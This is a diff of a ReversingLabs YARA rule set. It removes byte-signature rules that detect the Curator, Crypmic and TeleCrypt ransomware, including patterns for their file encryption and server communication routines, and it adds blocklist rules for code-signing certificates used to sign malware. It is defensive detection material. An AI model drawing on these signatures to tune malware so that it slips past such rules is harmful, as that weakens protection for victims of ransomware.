-            ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75
-            ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 8B 55 ??
-            8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ??
-            8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1
-            ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D ?? 51 E8 ?? ?? ?? ?? 83 C4
-            ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ??
-            52 E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D
-            4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB
-            ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ??
-            8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1
-            E0 ?? 8B 4D ?? 8B 54 01 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50
-            8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51
-            8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ??
-            8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D
-            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $file_search and $enum_shares and $file_encrypt_1 and $file_encrypt_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Yunhuitianxia Technology Co.,Ltd." and pe.signatures [ i ] . serial == "2d:f4:53:58:81:77:cf:1c:0c:29:7f:f4" and 1479735173 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Curator : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0619C5E39A4Fc60A32F9B07F6A4Ca328 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Curator ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "401f1d64-afd9-55b1-8e87-b808d4679e9a"
-		date = "2021-04-22"
-		modified = "2021-04-22"
+		id = "ae3ef9cf-4b67-5cb8-9c9b-3edb95da222c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Curator.yara#L1-L94"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16690-L16706"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8bd29195cea0f1194e27c48ed07c52100abb7dd3de2ef7f51a645d32c3527eb3"
+		logic_hash = "75e3dfd593d7fdc268de54430be617c015957a624f2ca36bc0036d4cbde5b686"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Curator"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF 15 ?? ?? ??
-            ?? 48 8B BD ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D ??
-            ?? ?? ?? 41 8B DC 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 7E ?? 45 33 F6 48 8B
-            05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 0F BE 8C 06 ?? ?? ?? ?? 45 0F
-            BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 8D
-            ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 4D 8D 76 ?? FF C3 41 83 C4 ?? 88 84 0D
-            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44 3B E0 7C
-            ?? 4C 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 E4 48 89 44 24 ?? 48 8D 95 ?? ??
-            ?? ?? 45 33 C9 44 89 64 24 ?? 44 8B C3 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 4C 24 ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ?? ?? ??
-            ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 8D 44 24 ??
-            48 89 44 24 ?? 45 33 C9 48 8D 44 24 ?? 89 9D ?? ?? ?? ?? 33 D2 48 89 44 24 ?? FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 41 8B DC 44 39 A5 ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 4C 04 ?? E8 ?? ?? ?? ?? 48 8D 95 ??
-            ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ?? ?? ?? 72 ?? 48 8B 8D ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ?? B9
-        }
-		$encrypt_files_p2 = {
-            48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 55 41 54 41 55 41 56 41 57 48 8D A8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89
-            85 ?? ?? ?? ?? 45 33 E4 C7 44 24 ?? ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 89 25 ?? ?? ??
-            ?? 48 8D 95 ?? ?? ?? ?? 44 89 25 ?? ?? ?? ?? 33 C9 44 89 25 ?? ?? ?? ?? 45 8B FC 4C
-            89 25 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8
-            48 8D 85 ?? ?? ?? ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 66 44 89 20 4C 8D 05
-            ?? ?? ?? ?? 48 83 C0 ?? 4C 89 64 24 ?? 48 89 05 ?? ?? ?? ?? 45 33 C9 48 8D 05 ?? ??
-            ?? ?? 44 89 64 24 ?? 33 D2 48 89 05 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 33 D2 33 C9
-            44 8D 42 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3
-            ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44
-            8B F0 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46
-        }
-		$find_files = {
-            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B
-            05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9
-            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24
-            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ??
-            ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
-            ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3
-            5D C3
-        }
-		$remote_connection = {
-            44 0F B7 45 ?? 33 DB 48 8B 55 ?? 45 33 C9 48 89 5C 24 ?? 48 8B CE 89 5C 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ??
-            ?? 80 7D ?? ?? B9 ?? ?? ?? ?? 4C 8B 45 ?? B8 ?? ?? ?? ?? 48 8B 55 ?? 0F 44 C8 48 89
-            5C 24 ?? 45 33 C9 89 4C 24 ?? 89 4D ?? 49 8B CE 48 89 5C 24 ?? 48 89 5C 24 ?? FF 15
-            ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 4C 8D 4D ?? 4C 8D 45 ??
-            C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 4D ??
-            ?? ?? ?? ?? 4C 8D 45 ?? 41 B9 ?? ?? ?? ?? 48 8B CB 41 8D 51 ?? FF 15 ?? ?? ?? ?? 4C
-            8B 4D ?? 48 8B C7 48 F7 D8 48 8B D7 8B 45 ?? 48 8B CB 45 1B C0 89 44 24 ?? FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? 33 FF 83 65 ?? ?? 48 8D 55 ?? 45 33 C9 45 33 C0 48 8B CB FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 49 8B CF 03 D7 E8 ?? ?? ?? ?? 44 8B 45 ?? 4C 8D 4D
-            ?? 8B D7 48 8B CB 48 03 D0 4C 8B F8 FF 15 ?? ?? ?? ?? 8B 45 ?? 03 F8 EB ?? 8B 45
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "06:19:c5:e3:9a:4f:c6:0a:32:f9:b0:7f:6a:4c:a3:28" and 1475884800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_2Bffef48E6A321B418041310Fdb9B0D0 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "6a29551f-8359-5394-9acd-00c3b25d7064"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16708-L16724"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "30a079b55b75b292f7af4f5ae99184cbb3cca1ce4cf20f2f5c961b533673db00"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A&D DOMUS LIMITED" and pe.signatures [ i ] . serial == "2b:ff:ef:48:e6:a3:21:b4:18:04:13:10:fd:b9:b0:d0" and 1554681600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Crypmic : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_34Ec9565805F34204C6966Fb81E36Ba1 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Crypmic ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0d5c2141-c0ca-53c8-91fd-ec2d5f163df2"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "bd032608-8622-5c7a-a3a7-808d73e611d7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Crypmic.yara#L1-L56"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16726-L16742"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ee97c4d35cee68e080a4e9e0a21ecd3698da638463881a58f5daaf906ef86f75"
+		logic_hash = "e434a02f5b9b22a25d8fe7a0bb7bd81b1cd8bc5356b4b626e3bfceb3f554a085"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Crypmic"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_and_encrypt_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? 57 8B F9 89 7D ?? C7 45 ?? ?? ?? ??
-            ?? 89 45 ?? 8D 50 ?? 68 ?? ?? ?? ?? 6A ?? FF 77 ?? 66 89 85 ?? ?? ?? ?? 8B 47 ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D0 66 8B 95 ?? ?? ?? ?? 33 F6 33
-            C9 89 45 ?? 66 3B F2 74 ?? 0F B7 D2 41 66 89 14 06 8D 34 09 33 DB 0F B7 94 35 ?? ??
-            ?? ?? 66 3B DA 75 ?? BA ?? ?? ?? ?? 66 89 14 48 8D 1C 48 8D 8D ?? ?? ?? ?? 51 C7 43
-            ?? ?? ?? ?? ?? 50 8B 47 ?? FF D0 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ??
-            ?? 74 ?? 66 8B 8D ?? ?? ?? ?? 66 83 F9 ?? 74 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 33 D2
-            33 C0 66 3B D1 74 ?? 0F B7 C9 8B FF 40 66 89 4C 1A ?? 8D 14 00 C7 45 ?? ?? ?? ?? ??
-            0F B7 8C 15 ?? ?? ?? ?? 66 39 4D ?? 75 ?? 8B 55 ?? 33 C9 66 89 4C 43 ?? 68 ?? ?? ??
-            ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 01 45 ?? 8D 85 ?? ?? ?? ?? 50 8B 47 ?? 56 FF D0 85
-            C0 75 ?? 8B 47 ?? 56 FF D0 8D 85 ?? ?? ?? ?? 50 FF 75 ?? C7 43 ?? ?? ?? ?? ?? 8B 47
-        }
-		$search_and_encrypt_2 = {
-            33 F6 89 75 ?? FF D0 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ??
-            F6 85 ?? ?? ?? ?? ?? 75 ?? 66 8B BD ?? ?? ?? ?? 33 F6 8B 8E ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 83 FF ?? 75 ??
-            EB ?? 8D 9B ?? ?? ?? ?? 66 8B 48 ?? 83 C0 ?? 83 C2 ?? 66 3B 0A 74 ?? 66 83 38 ?? 0F
-            85 ?? ?? ?? ?? 66 83 3A ?? 0F 85 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? 8B 7D
-            ?? 8B 75 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 50 8B 47 ?? FF D0 85 C0 8B 45 ?? 0F 85 ??
-            ?? ?? ?? 50 8B 47 ?? FF D0 85 F6 74 ?? 8B 55 ?? 33 C0 8B CF 66 89 43 ?? E8 ?? ?? ??
-            ?? FF 75 ?? 8B 47 ?? 6A ?? FF 77 ?? FF D0 8B 45 ?? 8B 5D ?? 03 C6 03 D8 8B 45 ?? 40
-            89 5D ?? 89 45 ?? BA ?? ?? ?? ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8B 47 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B CF E8
-            ?? ?? ?? ?? 83 C4 ?? 03 C3 5F 5E 5B 8B E5 5D C3 33 C9 33 C0 66 3B CF 74 ?? 0F B7 CF
-            33 D2 8D 9B ?? ?? ?? ?? 40 66 89 4C 1A ?? 8D 14 00 33 F6 0F B7 8C 15 ?? ?? ?? ?? 66
-            3B F1 75 ?? 8B 75 ?? FF 75 ?? 8B 7D ?? 33 C9 46 57 66 89 4C 43 ?? 89 75 ?? E8 ?? ??
-            ?? ?? E9
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "34:ec:95:65:80:5f:34:20:4c:69:66:fb:81:e3:6b:a1" and 1476921600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_B2B934B7F01E0Ac1E577814992243709 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "19930e7b-09cb-5c04-b838-3d8d73ba194b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16744-L16762"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "37b254ab76d144c09cc7b622dba59f5e372bf01ae12ce260a06143abb52062f6"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $search_and_encrypt_* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MS CORP SOFTWARE LTD" and ( pe.signatures [ i ] . serial == "00:b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09" or pe.signatures [ i ] . serial == "b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09" ) and 1590710400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Telecrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3A1B397Fd9451E3B5891Fc69681Ed73D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TeleCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c4eada2d-72c0-5efe-bf2b-8f053348d89d"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "6bdba43f-4003-5807-9adc-20691fbc8d14"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.TeleCrypt.yara#L1-L109"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16764-L16780"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9d856eae4369cd7ba1d88bd6ef37931e069127e2c05a84a44f5274f681e83fc0"
+		logic_hash = "ca43c7bacd8cb5a896c3135abf4a131bdb4a7f5093e64c8d1df743fad0c1c64a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TeleCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_file = {
-            57 E8 ?? ?? ?? ?? 89 03 EB ?? 6A ?? E8 ?? ?? ?? ?? 89 03 66 83 BB ?? ?? ?? ?? ?? 0F
-            85 ?? ?? ?? ?? 8B 03 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 81 7B ?? ?? ?? 75 ?? E8 ??
-            ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 43 ?? ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 6A ?? 6A ?? 50 8D 43 ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75
-            ?? 66 C7 43 ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 89 03 66 81 7B ?? ?? ?? 0F
-            85 ?? ?? ?? ?? 66 C7 43 ?? ?? ?? 6A ?? 8B 03 50 E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ??
-            8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 85 FF 7D ?? 33 FF 6A ??
-            6A ?? 57 8B 03 50 E8 ?? ?? ?? ?? 40 74 ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? 50 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ??
-            ?? ?? ?? F6 43 ?? ?? 74 ?? 83 3C 24 ?? 76 ?? 8B 14 24 4A 85 D2 72 ?? 42 33 FF 8D 83
-            ?? ?? ?? ?? 80 38 ?? 75 ?? 6A ?? 6A ?? 8B C7 2B 44 24 ?? 50 8B 03 50 E8 ?? ?? ?? ??
-            40 74 ?? 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 EB ?? 47 40
-            4A 75 ?? 66 83 BB ?? ?? ?? ?? ?? 75 ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? 66
-            81 7B ?? ?? ?? 74 ?? 8B 03 50 E8
-        }
-		$server_communication = {
-            6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-            ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ??
-            8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 80 ?? ?? ?? ??
-            33 C9 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 33 DB 8B CB B8 ?? ?? ??
-            ?? D3 E0 85 F0 74 ?? 8D 45 ?? 8B D3 66 83 C2 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 43 83 FB ?? 75 ?? A1 ?? ??
-            ?? ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B
-            38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 4E 75 ?? A1 ?? ?? ?? ?? 8B 10
-            FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 6A ?? 6A ?? 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B
-            38 FF 57 ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 43 4E 75 ?? 8D 55 ?? B8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ??
-            ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55
-            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8
-        }
-		$server_communication_1 = {
-            55 8B EC 33 C9 51 51 51 51 51 53 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A
-            ?? 8D 45 ?? 50 33 C9 BA ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ??
-            50 8D 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ??
-            ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 33 C9 8B 83 ?? ?? ?? ??
